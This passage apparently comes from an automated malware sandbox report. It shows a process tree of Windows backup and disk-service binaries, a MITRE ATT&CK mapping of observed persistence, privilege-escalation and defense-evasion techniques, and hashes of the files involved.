C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10144
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:21020
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:21436
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5908d539c1e2e4f09f05f8dd08828e293
SHA1397bae6f1fd29ecc8447ad69a4b0913de1ae7fb8
SHA256b758e2d1d925ef68a7d07cbd3b659eff00061652e5044d908b1977b05da0f85d
SHA512273e6798f1a8af8cec1e7267b30adb7c4ac24b6b0f500f3e35a21bdd95ba513ea64fdb69f23b6d926b8efac394025967de442e0f911d61e77e8582ca7f575583
-
Filesize
12KB
MD526bf06df0d6dc6adb075c306ba5c607b
SHA124a88154ddd4fc3e0d12a9136f8ac3f909b6a3eb
SHA25692a49d0a6adeb7ebacdc977d5a948ee90c3e16fa098ba31a2ecd0ca8c714b549
SHA512fad906da24e01a1a20a43576760bf1e70b4ad42261bdad5ce7c31e94992cc1ad29a4e66ec98f3d0bb524f0a6f22f40195535f290a20bb39f782f1796a937eef7
-
Filesize
684B
MD5a78890fa576c5e0cdb06683ed81bac4f
SHA13f28665c97ddbb58145604f3622dbb7ee53720c1
SHA25654265f9f4432d69d07cb0b30f9ba579fe3820027d1f7d7f57ff925cfd5f9db3d
SHA512f643e43861625682ac4acd44c3ee8ab5f2c4d76571d68c0017f40ff65cb4d6c5afca044c071deab26adac3fb007cd46f896598b5097cc9c4025cbd93fa629f41